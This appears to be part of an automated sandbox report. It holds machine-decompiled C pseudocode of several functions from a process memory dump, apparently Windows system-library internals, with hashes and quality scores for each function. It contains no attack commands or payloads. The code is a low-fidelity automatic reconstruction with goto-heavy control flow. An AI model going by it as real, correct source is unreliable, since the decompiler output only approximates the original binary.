                                                								_t47 = _t107 + 0x24; // 0x24
                                                								_t177 = _t47;
                                                								E01666B4C( &_v36, _t177, 0xc78,  &_v8);
                                                								_t51 = _v8 + 4; // 0x4
                                                								_t178 = _t177 + (_v8 >> 1) * 2;
                                                								_v12 = _t51;
                                                								E01666B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                								_v12 = _v12 + _v8;
                                                								E01666B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                								_t125 = _v8;
                                                								_v12 = _v12 + _v8;
                                                								E01666B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                								_t174 = _v12 + _v8;
                                                								if(E01607D50() != 0) {
                                                									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                								}
                                                								_push(_v16);
                                                								_push(_t174);
                                                								_push(0x402);
                                                								_push( *_t137 & 0x000000ff);
                                                								E01629AE0();
                                                								L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                								_t168 = _v20;
                                                							}
                                                							_t87 = L01602400( &_v36);
                                                							if(_v24 >= 0) {
                                                								_t87 = L01602400( &_v44);
                                                							}
                                                							if(_t168 >= 0) {
                                                								_t87 = L01602400( &_v52);
                                                							}
                                                							if(_v28 >= 0) {
                                                								return L01602400( &_v60);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return _t87;
                                                			}
































                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                • Instruction ID: 82d9eb60be175528fb42a70240fc676c2295aed2fd4dbfd84178adef003d17e1
                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                • Instruction Fuzzy Hash: 6E718F71A00619EFDB15DFA8DD84AEEBBBAFF48704F104169E504E7290DB30AA41CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 39%
                                                			E0167B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                				char _v8;
                                                				signed int _v12;
                                                				signed int _t80;
                                                				signed int _t83;
                                                				intOrPtr _t89;
                                                				signed int _t92;
                                                				signed char _t106;
                                                				signed int* _t107;
                                                				intOrPtr _t108;
                                                				intOrPtr _t109;
                                                				signed int _t114;
                                                				void* _t115;
                                                				void* _t117;
                                                				void* _t119;
                                                				void* _t122;
                                                				signed int _t123;
                                                				signed int* _t124;
                                                
                                                				_t106 = _a12;
                                                				if((_t106 & 0xfffffffc) != 0) {
                                                					return 0xc000000d;
                                                				}
                                                				if((_t106 & 0x00000002) != 0) {
                                                					_t106 = _t106 | 0x00000001;
                                                				}
                                                				_t109 =  *0x16d7b9c; // 0x0
                                                				_t124 = L01604620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                				if(_t124 != 0) {
                                                					 *_t124 =  *_t124 & 0x00000000;
                                                					_t124[1] = _t124[1] & 0x00000000;
                                                					_t124[4] = _t124[4] & 0x00000000;
                                                					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                						L13:
                                                						_push(_t124);
                                                						if((_t106 & 0x00000002) != 0) {
                                                							_push(0x200);
                                                							_push(0x28);
                                                							_push(0xffffffff);
                                                							_t122 = E01629800();
                                                							if(_t122 < 0) {
                                                								L33:
                                                								if((_t124[4] & 0x00000001) != 0) {
                                                									_push(4);
                                                									_t64 =  &(_t124[1]); // 0x4
                                                									_t107 = _t64;
                                                									_push(_t107);
                                                									_push(5);
                                                									_push(0xfffffffe);
                                                									E016295B0();
                                                									if( *_t107 != 0) {
                                                										_push( *_t107);
                                                										E016295D0();
                                                									}
                                                								}
                                                								_push(_t124);
                                                								_push(0);
                                                								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                								L37:
                                                								L016077F0();
                                                								return _t122;
                                                							}
                                                							_t124[4] = _t124[4] | 0x00000002;
                                                							L18:
                                                							_t108 = _a8;
                                                							_t29 =  &(_t124[0x105]); // 0x414
                                                							_t80 = _t29;
                                                							_t30 =  &(_t124[5]); // 0x14
                                                							_t124[3] = _t80;
                                                							_t123 = 0;
                                                							_t124[2] = _t30;
                                                							 *_t80 = _t108;
                                                							if(_t108 == 0) {
                                                								L21:
                                                								_t112 = 0x400;
                                                								_push( &_v8);
                                                								_v8 = 0x400;
                                                								_push(_t124[2]);
                                                								_push(0x400);
                                                								_push(_t124[3]);
                                                								_push(0);
                                                								_push( *_t124);
                                                								_t122 = E01629910();
                                                								if(_t122 != 0xc0000023) {
                                                									L26:
                                                									if(_t122 != 0x106) {
                                                										L40:
                                                										if(_t122 < 0) {
                                                											L29:
                                                											_t83 = _t124[2];
                                                											if(_t83 != 0) {
                                                												_t59 =  &(_t124[5]); // 0x14
                                                												if(_t83 != _t59) {
                                                													L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                												}
                                                											}
                                                											_push( *_t124);
                                                											E016295D0();
                                                											goto L33;
                                                										}
                                                										 *_a16 = _t124;
                                                										return 0;
                                                									}
                                                									if(_t108 != 1) {
                                                										_t122 = 0;
                                                										goto L40;
                                                									}
                                                									_t122 = 0xc0000061;
                                                									goto L29;
                                                								} else {
                                                									goto L22;
                                                								}
                                                								while(1) {
                                                									L22:
                                                									_t89 =  *0x16d7b9c; // 0x0
                                                									_t92 = L01604620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                									_t124[2] = _t92;
                                                									if(_t92 == 0) {
                                                										break;
                                                									}
                                                									_t112 =  &_v8;
                                                									_push( &_v8);
                                                									_push(_t92);
                                                									_push(_v8);
                                                									_push(_t124[3]);
                                                									_push(0);
                                                									_push( *_t124);
                                                									_t122 = E01629910();
                                                									if(_t122 != 0xc0000023) {
                                                										goto L26;
                                                									}
                                                									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                								}
                                                								_t122 = 0xc0000017;
                                                								goto L26;
                                                							}
                                                							_t119 = 0;
                                                							do {
                                                								_t114 = _t124[3];
                                                								_t119 = _t119 + 0xc;
                                                								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                								_t123 = _t123 + 1;
                                                								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                							} while (_t123 < _t108);
                                                							goto L21;
                                                						}
                                                						_push(0x28);
                                                						_push(3);
                                                						_t122 = E015EA7B0();
                                                						if(_t122 < 0) {
                                                							goto L33;
                                                						}
                                                						_t124[4] = _t124[4] | 0x00000001;
                                                						goto L18;
                                                					}
                                                					if((_t106 & 0x00000001) == 0) {
                                                						_t115 = 0x28;
                                                						_t122 = E0167E7D3(_t115, _t124);
                                                						if(_t122 < 0) {
                                                							L9:
                                                							_push(_t124);
                                                							_push(0);
                                                							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                							goto L37;
                                                						}
                                                						L12:
                                                						if( *_t124 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L13;
                                                					}
                                                					_t15 =  &(_t124[1]); // 0x4
                                                					_t117 = 4;
                                                					_t122 = E0167E7D3(_t117, _t15);
                                                					if(_t122 >= 0) {
                                                						_t124[4] = _t124[4] | 0x00000001;
                                                						_v12 = _v12 & 0x00000000;
                                                						_push(4);
                                                						_push( &_v12);
                                                						_push(5);
                                                						_push(0xfffffffe);
                                                						E016295B0();
                                                						goto L12;
                                                					}
                                                					goto L9;
                                                				} else {
                                                					return 0xc0000017;
                                                				}
                                                			}




















                                                0x00000000
                                                0x0167ba97
                                                0x0167b9f5
                                                0x0167b9f7
                                                0x0167b9f7
                                                0x0167b9fa
                                                0x0167ba03
                                                0x0167ba07
                                                0x0167ba0c
                                                0x0167ba10
                                                0x0167ba17
                                                0x00000000
                                                0x0167b9f7
                                                0x0167b9a6
                                                0x0167b9a8
                                                0x0167b9af
                                                0x0167b9b3
                                                0x00000000
                                                0x00000000
                                                0x0167b9b9
                                                0x00000000
                                                0x0167b9b9
                                                0x0167b94d
                                                0x0167b98f
                                                0x0167b995
                                                0x0167b999
                                                0x0167b960
                                                0x0167b967
                                                0x0167b968
                                                0x0167b96a
                                                0x00000000
                                                0x0167b96a
                                                0x0167b99b
                                                0x0167b99e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0167b99e
                                                0x0167b951
                                                0x0167b954
                                                0x0167b95a
                                                0x0167b95e
                                                0x0167b972
                                                0x0167b979
                                                0x0167b97d
                                                0x0167b97f
                                                0x0167b980
                                                0x0167b982
                                                0x0167b984
                                                0x00000000
                                                0x0167b984
                                                0x00000000
                                                0x0167b926
                                                0x00000000
                                                0x0167b926

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca21612f024852cdf156e39840501c80e5f0f28ba624b8d1ac9d8409a3095830
                                                • Instruction ID: 6e7cd4ce32b740d7f1f1d9ffef6a71d9212489a6e5dc847afad1377d489b2445
                                                • Opcode Fuzzy Hash: ca21612f024852cdf156e39840501c80e5f0f28ba624b8d1ac9d8409a3095830
                                                • Instruction Fuzzy Hash: 3971F232240B02AFE732EF18CC44F66BBE6EF40724F25452CEA55972A1DB75E941CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E015E52A5(char __ecx) {
                                                				char _v20;
                                                				char _v28;
                                                				char _v29;
                                                				void* _v32;
                                                				void* _v36;
                                                				void* _v37;
                                                				void* _v38;
                                                				void* _v40;
                                                				void* _v46;
                                                				void* _v64;
                                                				void* __ebx;
                                                				intOrPtr* _t49;
                                                				signed int _t53;
                                                				short _t85;
                                                				signed int _t87;
                                                				signed int _t88;
                                                				signed int _t89;
                                                				intOrPtr _t101;
                                                				intOrPtr* _t102;
                                                				intOrPtr* _t104;
                                                				signed int _t106;
                                                				void* _t108;
                                                
                                                				_t93 = __ecx;
                                                				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                				_push(_t88);
                                                				_v29 = __ecx;
                                                				_t89 = _t88 | 0xffffffff;
                                                				while(1) {
                                                					E015FEEF0(0x16d79a0);
                                                					_t104 =  *0x16d8210; // 0x1182c58
                                                					if(_t104 == 0) {
                                                						break;
                                                					}
                                                					asm("lock inc dword [esi]");
                                                					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                					E015FEB70(_t93, 0x16d79a0);
                                                					if( *((char*)(_t108 + 0xf)) != 0) {
                                                						_t101 =  *0x7ffe02dc;
                                                						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                							L9:
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0x90028);
                                                							_push(_t108 + 0x20);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push( *((intOrPtr*)(_t104 + 4)));
                                                							_t53 = E01629890();
                                                							__eflags = _t53;
                                                							if(_t53 >= 0) {
                                                								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                									E015FEEF0(0x16d79a0);
                                                									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                									E015FEB70(0, 0x16d79a0);
                                                								}
                                                								goto L3;
                                                							}
                                                							__eflags = _t53 - 0xc0000012;
                                                							if(__eflags == 0) {
                                                								L12:
                                                								_t13 = _t104 + 0xc; // 0x1182c65
                                                								_t93 = _t13;
                                                								 *((char*)(_t108 + 0x12)) = 0;
                                                								__eflags = E0161F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                								if(__eflags >= 0) {
                                                									L15:
                                                									_t102 = _v28;
                                                									 *_t102 = 2;
                                                									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                									E015FEEF0(0x16d79a0);
                                                									__eflags =  *0x16d8210 - _t104; // 0x1182c58
                                                									if(__eflags == 0) {
                                                										__eflags =  *((char*)(_t108 + 0xe));
                                                										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                										 *0x16d8210 = _t102;
                                                										_t32 = _t102 + 0xc; // 0x0
                                                										 *_t95 =  *_t32;
                                                										_t33 = _t102 + 0x10; // 0x0
                                                										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                										_t35 = _t102 + 4; // 0xffffffff
                                                										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                										if(__eflags != 0) {
                                                											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                											E01664888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                										}
                                                										E015FEB70(_t95, 0x16d79a0);
                                                										asm("lock xadd [esi], eax");
                                                										if(__eflags == 0) {
                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                											E016295D0();
                                                											L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                										}
                                                										asm("lock xadd [esi], ebx");
                                                										__eflags = _t89 == 1;
                                                										if(_t89 == 1) {
                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                											E016295D0();
                                                											L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                										}
                                                										_t49 = _t102;
                                                										L4:
                                                										return _t49;
                                                									}
                                                									E015FEB70(_t93, 0x16d79a0);
                                                									asm("lock xadd [esi], eax");
                                                									if(__eflags == 0) {
                                                										_push( *((intOrPtr*)(_t104 + 4)));
                                                										E016295D0();
                                                										L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                									}
                                                									 *_t102 = 1;
                                                									asm("lock xadd [edi], eax");
                                                									if(__eflags == 0) {
                                                										_t28 = _t102 + 4; // 0xffffffff
                                                										_push( *_t28);
                                                										E016295D0();
                                                										L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                									}
                                                									continue;
                                                								}
                                                								_t93 =  &_v20;
                                                								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                								_t85 = 6;
                                                								_v20 = _t85;
                                                								_t87 = E0161F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                								__eflags = _t87;
                                                								if(_t87 < 0) {
                                                									goto L3;
                                                								}
                                                								 *((char*)(_t108 + 0xe)) = 1;
                                                								goto L15;
                                                							}
                                                							__eflags = _t53 - 0xc000026e;
                                                							if(__eflags != 0) {
                                                								goto L3;
                                                							}
                                                							goto L12;
                                                						}
                                                						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                							goto L3;
                                                						} else {
                                                							goto L9;
                                                						}
                                                					}
                                                					L3:
                                                					_t49 = _t104;
                                                					goto L4;
                                                				}
                                                				_t49 = 0;
                                                				goto L4;
                                                			}


























                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e69e828a3f9ef8e406e9ae83cfa268d299e1317515261b7fe763806783c747b
                                                • Instruction ID: e14fb744308e63c2949f53e1995cfbc08527af0526c4e0ec88031bf8d433127a
                                                • Opcode Fuzzy Hash: 2e69e828a3f9ef8e406e9ae83cfa268d299e1317515261b7fe763806783c747b
                                                • Instruction Fuzzy Hash: 6D51EC31605752ABD322DF28CC45B2BBBE5FF90714F14092EF6958B651EB70E804CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01612AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                				signed short* _v8;
                                                				signed short* _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				short _t56;
                                                				signed int _t57;
                                                				intOrPtr _t58;
                                                				signed short* _t61;
                                                				intOrPtr _t72;
                                                				intOrPtr _t75;
                                                				intOrPtr _t84;
                                                				intOrPtr _t87;
                                                				intOrPtr* _t90;
                                                				signed short* _t91;
                                                				signed int _t95;
                                                				signed short* _t96;
                                                				intOrPtr _t97;
                                                				intOrPtr _t102;
                                                				signed int _t108;
                                                				intOrPtr _t110;
                                                				signed int _t111;
                                                				signed short* _t112;
                                                				void* _t113;
                                                				signed int _t116;
                                                				signed short** _t119;
                                                				short* _t120;
                                                				signed int _t123;
                                                				signed int _t124;
                                                				void* _t125;
                                                				intOrPtr _t127;
                                                				signed int _t128;
                                                
                                                				_t90 = __ecx;
                                                				_v16 = __edx;
                                                				_t108 = _a4;
                                                				_v28 = __ecx;
                                                				_t4 = _t108 - 1; // -1
                                                				if(_t4 > 0x13) {
                                                					L15:
                                                					_t56 = 0xc0000100;
                                                					L16:
                                                					return _t56;
                                                				}
                                                				_t57 = _t108 * 0x1c;
                                                				_v32 = _t57;
                                                				_t6 = _t57 + 0x16d8204; // 0x0
                                                				_t123 =  *_t6;
                                                				_t7 = _t57 + 0x16d8208; // 0x16d8207
                                                				_t8 = _t57 + 0x16d8208; // 0x16d8207
                                                				_t119 = _t8;
                                                				_v36 = _t123;
                                                				_t110 = _t7 + _t123 * 8;
                                                				_v24 = _t110;
                                                				_t111 = _a4;
                                                				if(_t119 >= _t110) {
                                                					L12:
                                                					if(_t123 != 3) {
                                                						_t58 =  *0x16d8450; // 0x0
                                                						if(_t58 == 0) {
                                                							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                						}
                                                					} else {
                                                						_t26 = _t57 + 0x16d821c; // 0x0
                                                						_t58 =  *_t26;
                                                					}
                                                					 *_t90 = _t58;
                                                					goto L15;
                                                				} else {
                                                					goto L2;
                                                				}
                                                				while(1) {
                                                					_t116 =  *_t61 & 0x0000ffff;
                                                					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                					if(_t116 == _t128) {
                                                						goto L18;
                                                					}
                                                					L5:
                                                					if(_t116 >= 0x61) {
                                                						if(_t116 > 0x7a) {
                                                							_t97 =  *0x16d6d5c; // 0x7f690654
                                                							_t72 =  *0x16d6d5c; // 0x7f690654
                                                							_t75 =  *0x16d6d5c; // 0x7f690654
                                                							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                						} else {
                                                							_t116 = _t116 - 0x20;
                                                						}
                                                					}
                                                					if(_t128 >= 0x61) {
                                                						if(_t128 > 0x7a) {
                                                							_t102 =  *0x16d6d5c; // 0x7f690654
                                                							_t84 =  *0x16d6d5c; // 0x7f690654
                                                							_t87 =  *0x16d6d5c; // 0x7f690654
                                                							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                						} else {
                                                							_t128 = _t128 - 0x20;
                                                						}
                                                					}
                                                					if(_t116 == _t128) {
                                                						_t61 = _v12;
                                                						_t96 = _v8;
                                                					} else {
                                                						_t113 = _t116 - _t128;
                                                						L9:
                                                						_t111 = _a4;
                                                						if(_t113 == 0) {
                                                							_t115 =  &(( *_t119)[_t111 + 1]);
                                                							_t33 =  &(_t119[1]); // 0x100
                                                							_t120 = _a8;
                                                							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                							_t35 = _t95 - 1; // 0xff
                                                							_t124 = _t35;
                                                							if(_t120 == 0) {
                                                								L27:
                                                								 *_a16 = _t95;
                                                								_t56 = 0xc0000023;
                                                								goto L16;
                                                							}
                                                							if(_t124 >= _a12) {
                                                								if(_a12 >= 1) {
                                                									 *_t120 = 0;
                                                								}
                                                								goto L27;
                                                							}
                                                							 *_a16 = _t124;
                                                							_t125 = _t124 + _t124;
                                                							E0162F3E0(_t120, _t115, _t125);
                                                							_t56 = 0;
                                                							 *((short*)(_t125 + _t120)) = 0;
                                                							goto L16;
                                                						}
                                                						_t119 =  &(_t119[2]);
                                                						if(_t119 < _v24) {
                                                							L2:
                                                							_t91 =  *_t119;
                                                							_t61 = _t91;
                                                							_v12 = _t61;
                                                							_t112 =  &(_t61[_t111]);
                                                							_v8 = _t112;
                                                							if(_t61 >= _t112) {
                                                								break;
                                                							} else {
                                                								_t127 = _v16 - _t91;
                                                								_t96 = _t112;
                                                								_v20 = _t127;
                                                								_t116 =  *_t61 & 0x0000ffff;
                                                								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                								if(_t116 == _t128) {
                                                									goto L18;
                                                								}
                                                								goto L5;
                                                							}
                                                						} else {
                                                							_t90 = _v28;
                                                							_t57 = _v32;
                                                							_t123 = _v36;
                                                							goto L12;
                                                						}
                                                					}
                                                					L18:
                                                					_t61 =  &(_t61[1]);
                                                					_v12 = _t61;
                                                					if(_t61 >= _t96) {
                                                						break;
                                                					}
                                                					_t127 = _v20;
                                                				}
                                                				_t113 = 0;
                                                				goto L9;
                                                 			}

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e1fe711d1c588fc99447310775210fa6e9f0e317eb9964f9408cde514e9bf442
                                                • Instruction ID: 4ea727960c9918af27c7671bdb5680bacd1cca9c71c4897199a77ade199aeb8d
                                                • Opcode Fuzzy Hash: e1fe711d1c588fc99447310775210fa6e9f0e317eb9964f9408cde514e9bf442
                                                • Instruction Fuzzy Hash: 0C51A376E001158FCB18CF1DCCA49BDB7B1FB88704729855EE8469B369D734AA51CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0160DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v5;
                                                				signed int _v12;
                                                				signed int* _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed int _t54;
                                                				char* _t58;
                                                				signed int _t66;
                                                				intOrPtr _t67;
                                                				intOrPtr _t68;
                                                				intOrPtr _t72;
                                                				intOrPtr _t73;
                                                				signed int* _t75;
                                                				intOrPtr _t79;
                                                				intOrPtr _t80;
                                                				char _t82;
                                                				signed int _t83;
                                                				signed int _t84;
                                                				signed int _t88;
                                                				signed int _t89;
                                                				intOrPtr _t90;
                                                				intOrPtr _t92;
                                                				signed int _t97;
                                                				intOrPtr _t98;
                                                				intOrPtr* _t99;
                                                				signed int* _t101;
                                                				signed int* _t102;
                                                				intOrPtr* _t103;
                                                				intOrPtr _t105;
                                                				signed int _t106;
                                                				void* _t118;
                                                
                                                				_t92 = __edx;
                                                				_t75 = _a4;
                                                				_t98 = __ecx;
                                                				_v44 = __edx;
                                                				_t106 = _t75[1];
                                                				_v40 = __ecx;
                                                				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                					_t82 = 0;
                                                				} else {
                                                					_t82 = 1;
                                                				}
                                                				_v5 = _t82;
                                                				_t6 = _t98 + 0xc8; // 0xc9
                                                				_t101 = _t6;
                                                				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                				if(_t82 != 0) {
                                                					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                					_t83 =  *_t75;
                                                					_t54 = _t75[1];
                                                					 *_t101 = _t83;
                                                					_t84 = _t83 | _t54;
                                                					_t101[1] = _t54;
                                                					if(_t84 == 0) {
                                                						_t101[1] = _t101[1] & _t84;
                                                						 *_t101 = 1;
                                                					}
                                                					goto L19;
                                                				} else {
                                                					if(_t101 == 0) {
                                                						E015ECC50(E015E4510(0xc000000d));
                                                						_t88 =  *_t101;
                                                						_t97 = _t101[1];
                                                						L15:
                                                						_v12 = _t88;
                                                						_t66 = _t88 -  *_t75;
                                                						_t89 = _t97;
                                                						asm("sbb ecx, [ebx+0x4]");
                                                						_t118 = _t89 - _t97;
                                                						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                							_t66 = _t66 | 0xffffffff;
                                                							_t89 = 0x7fffffff;
                                                						}
                                                						 *_t101 = _t66;
                                                						_t101[1] = _t89;
                                                						L19:
                                                						if(E01607D50() != 0) {
                                                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                						} else {
                                                							_t58 = 0x7ffe0386;
                                                						}
                                                						_t102 = _v16;
                                                						if( *_t58 != 0) {
                                                							_t58 = E016B8ED6(_t102, _t98);
                                                						}
                                                						_t76 = _v44;
                                                						E01602280(_t58, _v44);
                                                						E0160DD82(_v44, _t102, _t98);
                                                						E0160B944(_t102, _v5);
                                                						return E015FFFB0(_t76, _t98, _t76);
                                                					}
                                                					_t99 = 0x7ffe03b0;
                                                					do {
                                                						_t103 = 0x7ffe0010;
                                                						do {
                                                							_t67 =  *0x16d8628; // 0x0
                                                							_v28 = _t67;
                                                							_t68 =  *0x16d862c; // 0x0
                                                							_v32 = _t68;
                                                							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                							_v20 =  *_t99;
                                                							while(1) {
                                                								_t97 =  *0x7ffe000c;
                                                								_t90 =  *0x7FFE0008;
                                                								if(_t97 ==  *_t103) {
                                                									goto L10;
                                                								}
                                                								asm("pause");
                                                							}
                                                							L10:
                                                							_t79 = _v24;
                                                							_t99 = 0x7ffe03b0;
                                                							_v12 =  *0x7ffe03b0;
                                                							_t72 =  *0x7FFE03B4;
                                                							_t103 = 0x7ffe0010;
                                                							_v36 = _t72;
                                                						} while (_v20 != _v12 || _t79 != _t72);
                                                						_t73 =  *0x16d8628; // 0x0
                                                						_t105 = _v28;
                                                						_t80 =  *0x16d862c; // 0x0
                                                					} while (_t105 != _t73 || _v32 != _t80);
                                                					_t98 = _v40;
                                                					asm("sbb edx, [ebp-0x20]");
                                                					_t88 = _t90 - _v12 - _t105;
                                                					_t75 = _a4;
                                                					asm("sbb edx, eax");
                                                					_t31 = _t98 + 0xc8; // 0x16afb53
                                                					_t101 = _t31;
                                                					 *_t101 = _t88;
                                                					_t101[1] = _t97;
                                                					goto L15;
                                                				}
                                                 			}
                                                0x0160dcdc
                                                0x0160dcdc
                                                0x0160dce2
                                                0x0160dce4
                                                0x00000000
                                                0x0160dce4

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab299d9f9a549a1e03e324ceacde5af2c1f4917c18cfe5a178bb804619676ab8
                                                • Instruction ID: 17cfca4d2418f43af526311fad8654454a211e3791e5ec34893d9679af536907
                                                • Opcode Fuzzy Hash: ab299d9f9a549a1e03e324ceacde5af2c1f4917c18cfe5a178bb804619676ab8
                                                • Instruction Fuzzy Hash: 9451B275E01216DFCB1ACFE8C880A9EBBF5FF48350F24825AD955A7384DB70A944CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E015FEF40(intOrPtr __ecx) {
                                                				char _v5;
                                                				char _v6;
                                                				char _v7;
                                                				char _v8;
                                                				signed int _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _v20;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				intOrPtr _t58;
                                                				char _t59;
                                                				signed char _t69;
                                                				void* _t73;
                                                				signed int _t74;
                                                				char _t79;
                                                				signed char _t81;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				intOrPtr _t90;
                                                				signed char* _t91;
                                                				void* _t92;
                                                				signed int _t94;
                                                				void* _t96;
                                                
                                                				_t90 = __ecx;
                                                				_v16 = __ecx;
                                                				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                					_t58 =  *((intOrPtr*)(__ecx));
